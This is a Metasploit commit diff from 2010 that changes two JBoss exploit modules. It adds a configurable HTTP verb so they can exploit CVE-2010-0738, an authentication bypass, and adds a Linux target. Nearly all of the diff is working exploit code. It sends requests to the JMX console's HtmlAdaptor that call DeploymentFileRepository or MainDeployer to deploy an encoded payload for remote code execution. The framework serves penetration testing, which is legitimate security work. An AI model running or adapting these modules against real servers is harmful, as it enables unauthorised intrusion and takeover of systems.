add VERB option to enable exploiting cve-2010-0738

git-svn-id: file:///home/svn/framework3/trunk@9282 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-05-11 09:14:36 +00:00
parent c0494dcbc0
commit 7f758d5a02
2 changed files with 23 additions and 9 deletions

View File

@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2006-5750' ],
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'OSVDB', '30767'],
[ 'BID', '21219' ]
],
@ -57,7 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(8080),
OptString.new('SHELL', [ true, "The system shell to use.", '/bin/sh']),
OptString.new('URI', [ true, "The URI to call the payload.", '/web-console/']),
OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/'])
OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/']),
OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]),
], self.class)
end
@ -68,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor',
'method' => 'POST',
'method' => datastore['VERB'],
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
})
if (res.code == 200)

View File

@ -34,11 +34,12 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2007-1036' ],
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'OSVDB', '33744' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ]
],
'Privileged' => true,
'Platform' => [ 'win' ], # linux untested
'Platform' => [ 'win', 'linux' ], # linux untested
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
@ -55,6 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
]
],
'DefaultTarget' => 0))
@ -64,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
OptString.new('PATH', [ true, "The URI path of the console", '/jmx-console'])
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console']),
OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST']),
], self.class)
end
@ -140,15 +148,19 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Path' => resource_uri
}})
print_status("Making the request to the MainDeployer...")
res = send_request_cgi({
'method' => 'POST',
'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' =>
{
'action' => 'invokeOp',
'name' => 'jboss.system:service=MainDeployer',
'methodIndex' => '21', # deploy via java.net.URL
# deploy via java.net.URL
'methodIndex' => '3', # jboss 4.0.5
#'methodIndex' => '21', # jboss 3.0.8
#'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url
}
}, 20)
@ -199,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'method' => 'POST',
'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' =>
{